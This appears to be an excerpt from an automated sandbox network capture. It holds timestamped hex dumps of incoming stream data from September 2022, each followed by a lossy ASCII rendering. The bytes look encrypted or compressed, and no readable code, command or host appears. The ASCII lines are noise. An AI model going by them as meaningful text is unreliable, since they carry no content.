                                                                                                                                                            2022-09-29 12:45:21 UTC29829INData Raw: 68 1e 36 9e 35 ae ef 89 43 f1 b7 35 ae 32 d5 4c 24 1c 92 28 d1 4d 6d 90 fa 88 8c 69 23 a5 72 be 4c f8 d8 d2 8e bb 57 05 55 b9 c2 b0 8d f4 2b 01 41 bd 6b 43 dd 1b bd 33 b7 fe 56 5a 81 0a e1 5a b8 06 e3 18 de 34 58 a7 a7 43 6f 24 0d cc 83 7b 99 57 12 f3 d3 a9 10 08 59 75 22 01 b7 5b 6d 37 85 ef 2f e9 38 c4 69 c3 5f b2 22 91 70 5c 48 e0 9e 01 36 d5 36 fd c4 0f 80 dc 86 a6 11 d6 15 c9 a7 40 57 74 52 96 aa 28 6f 23 d5 64 24 cf d8 d1 27 81 65 23 8c b2 14 44 2b 4d 9e 8b b7 9b 02 fd f0 fc 8f 87 ae 12 4b 12 53 db 67 bb dc b1 93 b5 d4 3e 8e 4a 20 35 9f 83 17 08 77 9d f9 ad ea 96 2f 86 1c 33 1f c5 41 5a 80 e3 09 75 68 c9 3f f7 ce 7e f7 77 62 4c 9f d5 98 63 67 54 71 b8 25 2f 9c 12 7c 13 b3 31 27 ac da d3 01 86 31 0b b0 68 4e 2c 2d 4b 1f ed 4d 0f 54 a9 23 12 81 b8 3f
                                                                                                                                                            Data Ascii: h65C52L$(Mmi#rLWU+AkC3VZZ4XCo${WYu"[m7/8i_"p\H66@WtR(o#d$'e#D+MKSg>J 5w/3AZuh?~wbLcgTq%/|1'1hN,-KMT#?
                                                                                                                                                            2022-09-29 12:45:21 UTC29845INData Raw: f0 6a 01 a4 5b 4a 3e e3 0a 5a c3 82 47 cb 7b de 62 a5 f9 68 32 0e 13 5b 3d 1a 6b ff 6d e7 12 33 96 08 3b 64 3c 32 61 26 f3 4b 10 31 db f4 5e b3 0e f7 07 01 6c 78 45 cb c7 fb 96 3b b8 cb 7e 8a 1f fe fc e5 51 b9 fb 5c 83 f3 f6 1a 9f ce 08 9d a3 41 21 e8 ea f1 78 aa 8b 14 be 34 45 73 55 3a 95 b1 a1 0a 7d 13 79 7e c1 9b 60 ac 2b 25 2f 19 d6 ae 48 2e bc 60 14 da ed e8 7a 57 8c 8e 21 ca 6e eb 81 da 88 6d d9 18 56 38 97 f7 67 65 6a 41 60 e6 ea eb 68 17 a8 ee 15 1f 5e dc 89 1f ab 5d 1d 08 8a ec f0 39 f6 e4 fe a6 51 55 35 c8 c8 6c 89 63 79 4c 3b e6 94 9f c2 fe f5 fb bc 11 23 ed 24 2b 38 27 51 2c 6a a3 c7 d9 58 b6 76 80 1d 1d da 36 77 3d 7c ce 83 67 65 cc df d5 93 d3 7c 70 ec d2 43 c3 a0 3a 3a c6 a4 a2 13 1c dc 2b 57 31 57 19 d7 94 f5 eb 2b 28 2c d7 e0 b0 9a af cf
                                                                                                                                                            Data Ascii: j[J>ZG{bh2[=km3;d<2a&K1^lxE;~Q\A!x4EsU:}y~`+%/H.`zW!nmV8gejA`h^]9QU5lcyL;#$+8'Q,jXv6w=|ge|pC::+W1W+(,
                                                                                                                                                            2022-09-29 12:45:21 UTC29861INData Raw: 52 fb 2e e8 82 dc d6 c8 02 2c 1e 4d ae c8 b4 7e 83 02 19 c9 e8 17 74 77 fe b0 04 cf cf e8 2d 62 e1 73 07 fb ce 8d 7a 6d ad 0f ea 19 e5 3f 1b 29 11 91 db 9e 3b 4f cc 58 e3 4a 1b ab 12 9f a1 29 b4 d2 69 f4 5d 91 fb 33 8c 1c 3c c8 1f a4 85 e6 33 7a 58 87 9e 1e 7f 59 5b 75 87 f5 fe 87 9f 3d ea 57 39 7f 69 75 2c 72 a3 1b 6d 17 79 d4 2c 44 7c c6 c0 e0 7c 69 79 c3 23 d2 85 5a 02 3f b6 96 66 e4 1a 14 6c 77 9a 96 e8 4c 7c 6f 1d 5e 38 26 eb ab 75 c8 8a 31 e8 53 d4 7d aa 31 bd d4 1b ec dc 90 60 db d3 e1 33 5b c9 29 bb fc 56 d8 42 89 4d 61 a2 d1 15 95 14 16 a2 c3 86 ce 75 76 ea ce 3f 5b ea 3e 94 e3 87 01 df 59 5f d9 a1 e6 d8 2b bf d8 1b f6 2e 1c 7d 10 a3 d8 83 5c 7e 3d 14 0b 0d a1 ed c5 d6 ca 60 e1 bd 68 0f 73 4c e7 2a d3 c8 90 ac 3f 05 d1 85 21 c4 ad 4f b4 86 e0 49
                                                                                                                                                            Data Ascii: R.,M~tw-bszm?);OXJ)i]3<3zXY[u=W9iu,rmy,D||iy#Z?flwL|o^8&u1S}1`3[)VBMauv?[>Y_+.}\~=`hsL*?!OI
                                                                                                                                                            2022-09-29 12:45:21 UTC29877INData Raw: 4d df 93 6e 82 88 a2 f6 6d ca 0b 1f 64 60 9e 45 87 55 af 08 67 24 3e 6a bf 13 ad 05 1c 87 44 ec 5a 37 9a 66 b4 31 f0 38 f9 78 48 5c bb 49 56 90 a9 a1 c3 51 5c 4b 26 dd b3 24 eb 43 72 12 0e 4f 8e da 4d 8f ee 66 2c 57 a8 4b da a1 e4 67 f5 a6 ad c0 03 e5 a9 6f dc ee 15 48 39 2c 08 68 a2 ee 91 25 07 91 6b c9 d4 87 61 90 4a 7f e2 ec 7b ca 95 e0 2c 93 a4 80 fe 32 bd 01 af 30 ee b0 f0 2b 8c 63 42 fc 54 91 ca 0b ef cb ff 06 83 ed ec 82 97 1c c5 fa 72 b2 53 81 1e 65 49 7e 1c 55 7e 01 71 05 1b e8 78 69 23 a9 20 33 6f 71 a0 4c 84 60 95 d4 9e 5d e7 be 3b 17 2d e9 03 a2 93 20 22 83 40 a2 ab 08 82 ed 34 9f e0 1f 2a be 5b 1b 32 c9 22 1d 0b 13 2e 96 6c 9e 3a a4 a6 11 65 b8 ab ea 1c 2c 9c 52 c4 06 fb 16 78 08 d3 0e d2 56 29 1c 4c 16 8e f3 ae d2 5b 1d 72 c6 df 93 8f 30 fc
                                                                                                                                                            Data Ascii: Mnmd`EUg$>jDZ7f18xH\IVQ\K&$CrOMf,WKgoH9,h%kaJ{,20+cBTrSeI~U~qxi# 3oqL`];- "@4*[2".l:e,RxV)L[r0
                                                                                                                                                            2022-09-29 12:45:21 UTC29893INData Raw: c5 7e 2b f5 16 9b 1e 2d c9 77 05 da c0 a6 a7 51 89 3e 9f 4d 92 b2 9b 31 95 b9 7e c4 9f c1 81 95 94 7d 48 de 67 13 89 3f 31 a2 86 07 86 6e 78 a9 5e 40 06 86 f9 3c fe 53 9e 9b 07 8c 55 ec 53 0f 1b 57 97 5d ae 4d 76 a6 ef f2 73 dc 89 b2 8c a0 6b 67 e9 c1 75 4c 27 57 6f 88 b0 aa 83 0e 03 8c 97 f4 75 5a 36 16 03 c5 76 64 42 72 76 a6 cf 75 8a 21 44 ea 87 11 30 3b d8 29 d7 b3 06 4e ee 2f ab 74 c7 80 22 06 98 0c 97 98 bb 81 69 c9 b5 22 f2 96 6d c5 01 45 1b a7 89 de ce ca 73 00 03 98 13 38 ae 85 32 f0 11 c1 f9 f5 2a 4c 44 76 d5 05 da b4 9a 71 2e 13 c5 58 b5 fa 6a 0f 96 61 00 5b 9c b0 92 b1 40 5b 4c c5 67 11 f7 c8 0e 49 60 9c 1f f0 c3 cc 2f ec cc b9 00 fa 2d 6a b6 b8 c0 ac d4 d4 c2 5d 78 4d 2a dd 1d 70 e3 c3 fe 10 71 c0 b8 b8 23 51 c8 bc 35 90 8a 95 16 96 39 95 5e
                                                                                                                                                            Data Ascii: ~+-wQ>M1~}Hg?1nx^@<SUSW]MvskguL'WouZ6vdBrvu!D0;)N/t"i"mEs82*LDvq.Xja[@[LgI`/-j]xM*pq#Q59^
                                                                                                                                                            2022-09-29 12:45:21 UTC29909INData Raw: e4 51 31 f3 9c 86 83 96 80 10 04 4c 6e cc 83 75 14 53 b6 d8 56 0e be 27 9f 71 36 d2 f9 17 39 7b 4a fe de 82 26 d8 2f 1d ad 48 a7 48 2f 42 1c 6e ff ad 39 7b 64 61 d8 8b 51 c0 1c 25 0c 29 f8 64 18 4d dc db 71 98 c8 26 6b b8 f5 21 e7 88 b3 4a a2 49 81 44 7c 6b 20 da d5 4a d1 31 1c 0d 82 3e 23 ad 8a 25 dd 5d 42 89 f9 36 3f e6 2f e0 31 61 4a 11 4a c3 c0 37 d7 ff bc c8 82 35 02 33 5b df c0 1b 15 de 17 ae e4 60 57 b8 73 13 49 02 32 96 c0 21 a5 30 a0 b0 d2 4f 23 4d 61 be b6 6b f7 04 36 51 9a 09 82 70 e0 2d c8 85 17 f2 19 39 e7 03 a5 c6 3a 5f 00 39 51 6b 65 05 8d f2 21 ba a6 94 62 e0 7a ff fb 9d 02 c5 e1 0d 73 c1 af f4 0f 28 71 5d 39 61 11 c9 88 90 f0 eb 21 0b 04 81 a8 44 7e be e9 c9 a6 9f 75 37 1b ed a8 de fe 7a 1c f3 44 cc f1 d2 7d 4d f1 6c 14 8d a2 55 dd 0f 7f
                                                                                                                                                            Data Ascii: Q1LnuSV'q69{J&/HH/Bn9{daQ%)dMq&k!JID|k J1>#%]B6?/1aJJ753[`WsI2!0O#Mak6Qp-9:_9Qke!bzs(q]9a!D~u7zD}MlU
                                                                                                                                                            2022-09-29 12:45:21 UTC29925INData Raw: ce f5 a1 e1 84 23 42 e2 11 3b 0d a0 d4 2c f8 2a c1 e7 8e 44 54 40 be 05 0a 6b 05 1c 08 d4 8c 62 ad ce a7 50 de e0 79 52 f6 1d c5 3e 5e a4 59 fb 91 f0 4d 61 c3 f4 ba 7d 71 a2 a2 b4 7e d2 4e b8 50 18 bc b9 38 d3 ef 11 a2 c0 1b d4 be 72 c8 63 b2 9e a8 d5 11 79 17 bf eb 13 cf 09 f4 c2 e7 0a 5f e7 55 75 f6 d7 54 31 e4 92 d8 d1 72 0e 89 83 e7 e4 5b 54 2f 7d 82 0e 0e 43 59 61 39 66 18 d7 10 48 5f f6 67 1b 3c ab 49 df 51 0e 18 77 92 43 95 a4 60 f0 89 5c 65 74 d1 25 cb e0 d1 3e 55 ab 26 a4 d9 0a 9a 11 57 ed 31 f2 80 d6 08 b7 74 a1 7f 37 cd 5e 8c 06 7a e5 f0 f7 96 b4 5c 5f 9b 82 df ff b8 66 71 e3 9a 0c 98 1e 0c 35 67 ab 5e a7 f3 36 12 b0 9c 92 3c 10 16 10 7e 3f 55 23 64 9c be 2c 5a 2f 79 e3 4c 57 9a a3 8e c5 7c f0 dc 03 84 0d 5b 27 8d 85 2b 35 00 56 d2 d2 40 ee b5
                                                                                                                                                            Data Ascii: #B;,*DT@kbPyR>^YMa}q~NP8rcy_UuT1r[T/}CYa9fH_g<IQwC`\et%>U&W1t7^z\_fq5g^6<~?U#d,Z/yLW|['+5V@
                                                                                                                                                            2022-09-29 12:45:21 UTC29941INData Raw: ff 98 6a b8 bb 0a 1b d7 47 fb 6d 54 8f 02 a6 b9 13 c0 f0 2b 85 bb 8f 4e c0 98 c1 3a d8 6d e3 4a ef c0 c9 5c 71 16 89 dc ef e2 76 5b dc f9 d6 c8 80 04 9e 8c f1 59 27 a9 60 c9 ed dd ba a4 b2 bd 99 90 13 8e e7 13 f9 66 0c 87 fc ad 27 66 82 a8 4a f5 f6 08 fe 67 49 ca e9 aa f1 89 4f ce 66 c2 fb 10 db ae cf 2d d2 9a b5 e4 9f bc 12 c5 3c 5a af 95 3b 17 83 f4 a6 80 14 48 52 86 54 71 f3 84 b7 0e 95 1b 9a 44 c9 e3 9c ed bb 69 37 99 d9 d6 9d 76 fa 2d f8 a0 b8 d7 a3 a7 bd 1d f8 fd 3f bd ee 91 e6 ca 5b b2 97 a5 4e f3 45 1e 18 82 50 5d d5 05 10 16 d1 5c f4 4e cd 7b 85 d0 67 eb 55 f9 e3 76 29 be c9 2c c4 28 49 37 17 11 f0 3a db 72 ac 17 10 ca 13 8f d9 34 5f 55 d4 f5 11 e8 68 e9 bf 37 0b b7 f4 d8 2c d0 75 ce 30 2c 8d 8b 81 a8 39 de d8 89 d6 64 8c 5a 8f 50 b0 ef f9 f9 8d
                                                                                                                                                            Data Ascii: jGmT+N:mJ\qv[Y'`f'fJgIOf-<Z;HRTqDi7v-?[NEP]\N{gUv),(I7:r4_Uh7,u0,9dZP
                                                                                                                                                            2022-09-29 12:45:21 UTC29957INData Raw: 4a 9f dc 6f e4 ed 92 aa de f7 96 ed 68 18 33 12 43 61 eb 11 c2 a6 e9 70 44 52 59 dd 04 f0 f7 76 51 52 5f 88 8d 01 14 9b 83 8b b3 1f 02 81 f6 a3 99 1f ac 9f 6e 13 af d5 8b 71 7f e4 57 8d 13 07 94 88 34 5c 3a 62 d0 c8 a9 ca 0d ac 4b d0 9f 83 4a 68 80 20 d3 a7 c2 fc 05 04 fd da f2 c2 90 ac e7 0f 46 13 dd b8 3e 3e ae 6d 23 88 1a 0f 7c 9f ba a2 76 09 c2 a7 44 f9 3c c7 6b cc 65 d7 bd 8a 04 f2 77 75 84 d1 b6 7a e7 2e 27 02 ff 81 40 ba da 62 a1 fa 7d 26 b1 be af 86 9f 34 e9 b8 c0 d9 78 08 3b a1 ff 91 c2 e7 d3 16 9c 81 56 2b 67 2b ed e8 32 17 fb 9e 45 db 87 76 11 1c fe 49 3d 2d c7 44 6c a2 5f ce 05 0f f7 52 e1 a4 a6 2e 27 bc b5 a4 74 c2 55 96 82 39 9e 1b e9 11 0e 3b 5a 0e 43 22 fb 45 b1 16 9a 8a 48 44 8d 57 c2 6c fb ce a2 c9 9a 15 51 5b d2 2d b8 8f 8a 25 58 32 6f
                                                                                                                                                            Data Ascii: Joh3CapDRYvQR_nqW4\:bKJh F>>m#|vD<kewuz.'@b}&4x;V+g+2EvI=-Dl_R.'tU9;ZC"EHDWlQ[-%X2o
                                                                                                                                                            2022-09-29 12:45:21 UTC29973INData Raw: 0f ab c0 67 a2 39 fb fe 02 d5 2b 6e 6a bc 8e 0a b1 c0 4c 07 03 91 c5 03 5e 5a 1a ed 5f 30 92 0d 37 1e 5e 1c 7e 16 02 17 32 e3 e8 0a 45 34 3c ab 6b 40 bf 84 58 ef 95 32 50 05 ba 77 73 3a 08 61 18 0a c9 55 9b 52 c0 c1 6d 96 f4 83 a8 2c 45 7f c3 f2 6c 97 57 d3 cf c0 a5 c2 15 e4 46 ae 04 4d 06 03 b5 0a e9 81 e9 a5 84 7e e8 0d 46 f0 a8 3b bc 67 5b 31 cb 10 f7 c9 c5 ae 68 fb b0 4c 3d a3 9c 4d 0b d9 b3 b9 60 23 bf 33 c5 8c 06 d9 a1 69 9f 9c 45 bb 70 5e 24 ff 36 ed d4 a6 1f 47 86 fe cf f7 d2 3e 40 04 8e ff 5c 14 34 15 e4 a4 b4 5c 96 ab 71 ba 13 95 e6 86 7d 79 2d 08 b4 22 e6 52 1c 25 f4 99 00 72 4f 11 a6 2b 31 dd df a6 a9 d4 44 8d 44 4d 20 07 01 dd 11 ff ed 67 10 b7 90 1e 24 88 66 69 28 60 3b 0f 4a 54 fa d1 d8 d8 f7 e5 f5 f5 27 ff d0 22 ae 97 1d f1 ef d3 02 d7 1b
                                                                                                                                                            Data Ascii: g9+njL^Z_07^~2E4<k@X2Pws:aURm,ElWFM~F;g[1hL=M`#3iEp^$6G>@\4\q}y-"R%rO+1DDM g$fi(`;JT'"
                                                                                                                                                            2022-09-29 12:45:21 UTC29989INData Raw: 0c b9 b6 ca 6f 3f 6f 63 f3 75 eb f7 44 5a 68 0b d8 61 b4 af c5 43 50 48 ee d3 b4 bc 70 76 ca a3 c5 fb d9 81 ca df 0d b5 78 ea c6 b8 5a ad 15 16 74 e0 21 26 5f a6 81 e8 ef 77 c3 71 67 f5 ba 67 12 e3 4d 0e 74 62 80 0a bf 51 49 6d 17 8c 1c 1f 4c 68 0b 7a 1c d1 a0 05 0d 31 3e 62 31 68 a3 20 e7 3a ff 66 82 25 ca 68 05 54 b2 76 19 d7 b9 24 5e 4b e2 b0 14 03 3d f8 63 23 83 07 79 a4 d2 69 c6 8e 9f 3a c5 39 e5 1d 48 e2 2c 63 8f f0 e2 0e 57 09 aa bd a0 bb bd 31 2c bd 27 25 74 2e aa 9f 2a fe bc a7 6d b8 a7 0c 61 90 ae 9a 83 24 74 6b 68 1a 25 c9 b9 74 db cb 73 3f bf e3 ca d2 57 4d 43 72 32 25 52 0e f9 7a 56 77 3f 91 b3 17 54 c2 6a ec db c0 29 79 a3 b5 60 34 9f c4 79 61 e0 65 69 26 e1 5e ec 5b 36 f9 06 05 e9 f4 9b b5 2f ac bb 82 3e 3e 4b 3d 3b 3e b0 9f 7b 52 28 c7 43
                                                                                                                                                            Data Ascii: o?ocuDZhaCPHpvxZt!&_wqggMtbQImLhz1>b1h :f%hTv$^K=c#yi:9H,cW1,'%t.*ma$tkh%ts?WMCr2%RzVw?Tj)y`4yaei&^[6/>>K=;>{R(C
                                                                                                                                                            2022-09-29 12:45:21 UTC30005INData Raw: ba 33 95 65 0b 59 8f bd 06 b9 00 a1 d4 ee e1 b9 a5 0f 16 21 99 a3 4b 00 da 7f 09 89 20 b8 80 8c 81 41 f9 28 5f b3 83 a7 52 5f 57 60 9a 95 36 41 0e e4 9e 7e f8 1f ac b3 cc ad c7 40 1c b8 0d 48 df fd 78 66 37 07 51 c0 61 af 6b b7 f7 a7 26 c0 a2 5d 3b 36 4b f9 b1 d5 01 2d ab 24 f5 8d c4 08 89 e1 36 f3 dc ef 92 7c bc 79 64 b4 ea f3 a6 c6 08 bd a3 2e bf 10 56 e4 0d 80 ed e3 d2 fe 73 12 9f 76 42 11 1c 24 15 1d 34 fc 05 19 4d 2d 43 db 10 69 32 1a b5 a3 da 7c 7b cd 61 c4 8a 02 42 d3 61 e1 78 a4 2e 5d 08 26 2d 1a 9d 6c 33 4d 03 16 4b a5 ce 18 e7 33 46 4f 98 84 3f dc b0 c9 95 18 18 74 0f 40 3c 28 69 c6 50 db 29 43 77 4c 57 f4 ac 42 89 a1 d8 2c 97 74 5d 7a c0 e2 7b a8 25 4f 8e 2c 1b fa c9 72 52 a9 37 ba 1d a1 04 9c e8 5f 9f f4 ee f6 20 f0 4d 59 92 24 75 f5 da be 9b
                                                                                                                                                            Data Ascii: 3eY!K A(_R_W`6A~@Hxf7Qak&];6K-$6|yd.VsvB$4M-Ci2|{aBax.]&-l3MK3FO?t@<(iP)CwLWB,t]z{%O,rR7_ MY$u
                                                                                                                                                            2022-09-29 12:45:21 UTC30021INData Raw: d6 6a bd 6a 2c 3a e5 71 5f 88 a7 a7 40 d8 e1 31 09 60 ab a8 6b 1f 85 ce 38 a5 b9 f2 27 d4 ca cf 3c e8 56 35 7b 14 97 26 52 24 39 16 31 3f 21 27 90 ee 14 f8 b1 66 a8 33 4f a7 10 e6 77 59 95 36 2a dc 1b 81 90 d3 b8 78 dc a3 db 2b 1f a4 cd 83 d5 81 5d 07 ba 2c c3 a2 81 bc 42 66 6f eb 67 90 f3 52 7c c5 e7 de 11 a3 23 3c d8 7f 83 08 7d 6f c1 99 07 ce 2e 23 ea 1c 8e 0d 0d 0f a8 28 91 a9 11 64 fe 4e 24 83 4b 2b 24 b2 07 e5 d9 35 f8 ce 79 6a f3 1d f5 bd b9 f1 8d 2c 59 4e 54 21 0e b5 19 80 62 18 ed 4a 93 db 6b fd a7 fb a6 31 f5 af 04 71 2b 73 94 4b 42 9f b8 5a ed 4d ff c0 91 cb 34 50 ae 9c ed bf d5 46 88 69 5c 43 0f f6 5f e2 8f 91 e7 82 57 0e f0 b2 59 40 8d af e4 a7 dc 00 e9 06 04 25 cd 2f ea ad 49 a5 53 33 b6 12 de 21 e9 57 e7 8f 7f 1d ee da 55 57 92 14 7d 57 ab
                                                                                                                                                            Data Ascii: jj,:q_@1`k8'<V5{&R$91?!'f3OwY6*x+],BfogR|#<}o.#(dN$K+$5yj,YNT!bJk1q+sKBZM4PFi\C_WY@%/IS3!WUW}W
                                                                                                                                                            2022-09-29 12:45:21 UTC30031INData Raw: 04 5c 77 1f 44 5e 0d f1 16 b0 e7 d7 e0 25 bd 4b d9 bb 71 e7 25 05 a8 78 04 5b 2f c2 31 ce ae 28 bd e0 61 07 da c6 40 6b 95 57 b2 5c 48 e7 96 85 44 5d 4b 0c 1b 4d ab a2 3b 01 bf e8 09 97 e4 0e b0 64 62 de b6 44 b6 70 82 4e 65 64 c3 07 64 5f a3 45 fe 0b 42 fc 69 1a 01 c5 8a fb 97 46 f7 74 ca 9d ec ae 1c e6 7f 7c 74 4e b1 55 df 1b d0 41 73 4d 4b 16 a0 9c ca 61 99 e1 25 a0 bb 5e 43 15 f2 df 79 29 9e 4a 2b ab 65 7f 98 4a 4a 56 e6 41 a1 84 a3 8f 38 bd 16 88 f6 04 42 96 46 7c 88 a2 b1 6d bf 73 d5 f5 6b d3 30 e7 61 90 32 6f 1b 70 8c 4c 97 fa 73 cb b3 11 21 c1 af e1 27 a5 74 8b 28 e3 b9 d4 12 07 82 ec e0 e9 09 54 2a 62 68 84 05 54 c5 cb 52 e9 da f0 ca f2 46 86 5d 3c 3d 0f c1 a0 6e 76 95 96 3b cd f4 c1 91 ba 31 ca e1 6a d0 17 16 ea 6c 90 e5 55 f2 68 65 82 29 22 3d
                                                                                                                                                            Data Ascii: \wD^%Kq%x[/1(a@kW\HD]KM;dbDpNedd_EBiFt|tNUAsMKa%^Cy)J+eJJVA8BF|msk0a2opLs!'t(T*bhTRF]<=nv;1jlUhe)"=
                                                                                                                                                            2022-09-29 12:45:22 UTC30047INData Raw: 2e 23 45 63 3c b5 a7 3f 3b 1d 2d ab 3b 04 75 ee 09 12 5c 05 73 02 59 56 ab a8 7f c0 14 8e 3d db 50 82 63 d9 18 5e 4c f4 3a 41 dd e5 dc 1d a8 c3 4c c8 dc 31 71 8c 0e 5b 1d bd f1 c9 72 f1 31 1b bb 51 50 ca 25 d9 33 19 cc 19 45 a0 e6 35 dd 69 ef cc 0e 75 fa 87 8d 5b a7 e0 63 73 5e a1 7c 90 12 22 9e bb fa 5e 5c 6b 06 fb b4 4b fa f2 a0 7f 01 51 ad de 7e 24 98 85 95 d3 8f db 79 ad 1f ee 46 a6 ae 46 d6 fd 6d 15 52 1f 4c 3e bd 30 4c a8 4d 80 a1 ee 97 a3 73 5e ec ff 94 ac 2d d3 41 e7 d6 ef 41 d8 e7 df 11 ee dc 83 fd 3f 71 f8 e6 87 7c f6 a4 af 8d b6 45 c2 7c a7 e1 63 d5 db 55 a4 aa d5 1a 4f c4 46 2a 56 07 9b f6 49 b6 75 78 26 21 9a e5 2b 7d fd 04 88 3e bf 03 4f d7 eb 75 99 da b1 c2 b1 76 86 fe 67 08 96 1f 3b 22 78 41 b5 8b 88 78 95 14 85 02 2d 30 81 dc f0 ee 7b c0
                                                                                                                                                            Data Ascii: .#Ec<?;-;u\sYV=Pc^L:AL1q[r1QP%3E5iu[cs^|"^\kKQ~$yFFmRL>0LMs^-AA?q|E|cUOF*VIux&!+}>Ouvg;"xAx-0{
                                                                                                                                                            2022-09-29 12:45:22 UTC30063INData Raw: e2 bb b5 c3 61 63 22 3b 12 55 8c ff 70 58 3d 83 c5 7f e5 f5 8c d3 80 16 5d 6d dc b4 08 17 22 ab 24 38 73 0e 29 b3 8e 6d 98 5c 85 93 8d 45 89 c0 0a f4 58 99 36 b9 fc c9 89 0b d5 9f ce a5 91 79 f0 f1 f5 62 34 04 be d9 15 5e 5c 08 b3 a8 d1 7a cf 71 ef 98 cd 3e f4 22 b0 3f 2b d3 58 3e 0b d2 8c c7 a0 7c f9 a5 02 0c e8 3b 0d 61 77 27 b4 e9 22 45 68 14 d6 82 16 51 50 f6 ed 96 2e 2e 43 75 af 14 2f 83 a6 04 98 51 ae 7d 06 f5 3f 85 72 28 c5 e1 ec 5e a7 68 64 a6 68 08 9f c7 61 0d 08 d4 c7 00 63 04 62 51 61 0a d8 97 8f 51 ce 8d fc ac e5 a4 b8 7c e9 c4 c2 32 db a3 5e 39 74 0c 29 2b be 32 31 46 20 75 01 1e 15 dd 62 93 14 23 5a ca 8e 71 9a c2 eb 96 f2 56 af 82 6f c1 bc 67 8e 7e 19 62 b7 71 8e bd c9 e5 82 b3 32 2f b5 66 d0 59 f7 59 c2 96 a2 a8 1b fc 32 b7 99 9e e4 d1 12
                                                                                                                                                            Data Ascii: ac";UpX=]m"$8s)m\EX6yb4^\zq>"?+X>|;aw'"EhQP..Cu/Q}?r(^hdhacbQaQ|2^9t)+21F ub#ZqVog~bq2/fYY2
                                                                                                                                                            2022-09-29 12:45:22 UTC30079INData Raw: 17 ad e7 36 c8 16 92 ab 09 a7 41 3d 19 0f df ae 5f 58 ee bc 2e de 04 6b f3 3f 65 97 ad e9 e3 bf 17 ed bb d8 28 8b 42 6b 73 75 79 f3 e6 8a f3 a2 ec 00 24 f1 27 1b 2b e0 ba bb e0 75 d2 f7 60 07 76 15 10 0d 99 6d d0 00 58 88 8a 65 5e eb f2 a0 5d 11 81 c4 55 f2 e4 aa 78 2d 1a 6b 5b a6 9f 4b 7c 02 79 e4 91 1d a2 9b 28 e1 ce 8c 35 ed 72 c6 85 c3 d1 0a 2b 67 16 d6 24 3b d9 a9 5b bc 91 3d 59 e1 9f 95 44 44 f1 cd 20 45 4b 81 95 78 9c 6d 24 03 88 c0 4f 85 63 71 e3 ef 8d f7 e2 b0 20 56 e5 d0 cb 68 f1 2d 45 91 5d 04 41 2b 66 a5 bc 48 81 d4 12 69 1e eb e0 54 94 17 0d 6e 83 f4 32 ba 26 76 ba 4e 1f cf c2 87 b7 72 ae 28 a6 bd cb 2b a0 e2 99 08 e3 0c 14 f2 cf 7e 84 7e 2c a1 11 29 bf 5e 98 20 ff ad 00 20 b9 13 65 3f 61 9d d9 60 64 71 dd 0f 8b c7 75 30 7a 52 26 32 87 d1 e3
                                                                                                                                                            Data Ascii: 6A=_X.k?e(Bksuy$'+u`vmXe^]Ux-k[K|y(5r+g$;[=YDD EKxm$Ocq Vh-E]A+fHiTn2&vNr(+~~,)^ e?a`dqu0zR&2
                                                                                                                                                            2022-09-29 12:45:22 UTC30095INData Raw: 05 a4 7e 49 14 38 ee 24 1d 18 7f 5e 2b 77 e1 21 e8 bc 83 47 f4 66 c7 0b 82 c8 f9 47 b4 e7 8f 21 9b ed b7 9c f3 85 be 45 8e d4 da 71 92 07 e5 c1 6a a3 f9 04 a7 b7 61 60 e2 be 62 a1 b8 6a 66 ce f9 68 ca a4 23 16 a4 f6 16 8d fb 75 64 3a 50 9d cd c7 e2 23 73 20 4d 24 12 65 b5 67 db 26 47 79 88 5e 75 6f df 2c 5a 18 34 c3 25 7b fc 95 68 bb c5 21 72 d1 3a b5 da 2e 28 27 65 bc dd 2e 71 70 80 e5 fc 8c 7b 59 37 3b 38 e1 1c 91 92 d2 06 f1 52 0f 91 36 f2 cc 48 50 23 33 61 c7 94 f6 26 62 d3 cd f7 e2 62 5e 57 0d 9a 0e a5 5d 8f ce 37 82 69 fb 71 a4 31 3e 87 a0 29 4e d2 7c ed 64 f4 b8 72 68 c0 70 de 3c 53 80 b6 72 ba 88 4e 53 92 d3 cc 34 13 d7 17 22 62 08 77 a4 a6 5e 60 2c 08 e1 d4 73 34 86 99 fe 0b ab 05 4b b3 1e bf 56 08 a1 58 92 57 86 91 1d 44 f8 da 64 c3 a3 a7 44 66
                                                                                                                                                            Data Ascii: ~I8$^+w!GfG!Eqja`bjfh#ud:P#s M$eg&Gy^uo,Z4%{h!r:.('e.qp{Y7;8R6HP#3a&bb^W]7iq1>)N|drhp<SrNS4"bw^`,s4KVXWDdDf
                                                                                                                                                            2022-09-29 12:45:22 UTC30111INData Raw: 32 81 5b c0 77 b7 ef 66 1a 4f ca fd c5 4b 8a 0e ed 2d 36 d7 01 8c 1e 76 3d 04 89 93 90 0d 4e cb 48 a9 d9 f0 83 dc d7 3e aa 20 e6 28 77 53 06 e5 4e fe e7 90 db 76 da a6 59 df 56 3d 20 2f ed 6e 2d 63 39 b1 44 43 b5 79 18 61 73 c2 1a 0d d1 d7 6c 73 3c 5e 8c 8a 10 f7 b0 71 c9 24 bb 63 46 cc 32 f7 5e 27 91 72 d3 96 71 b4 da 88 8f ba 52 58 6f fb 4a 05 89 b0 a0 b3 db f9 66 bd 1d fc 4b 6b b5 37 8e e6 d9 44 e1 3a c3 2e 5d 35 b9 d4 65 76 d9 d2 23 b0 9a 28 e4 4a 2a 39 03 c9 76 43 72 da 9e 5c 78 74 ea 37 cf b4 b6 a1 42 14 f3 5c 21 cd 7c 7f 8f d2 29 25 80 1e 9e 38 0b d2 22 49 ef cd 41 3a 2a 76 bd d9 5f 70 ff 1c c6 6a a8 2b 5b a8 36 14 f8 a2 a7 e3 87 f6 46 a2 31 f4 28 46 c6 44 4c ce 59 af 60 d2 11 4f ee 82 92 90 ae 7e 24 57 e9 24 5a a0 e1 6b f7 b6 22 3c 29 80 31 4b 2f
                                                                                                                                                            Data Ascii: 2[wfOK-6v=NH> (wSNvYV= /n-c9DCyasls<^q$cF2^'rqRXoJfKk7D:.]5ev#(J*9vCr\xt7B\!|)%8"IA:*v_pj+[6F1(FDLY`O~$W$Zk"<)1K/
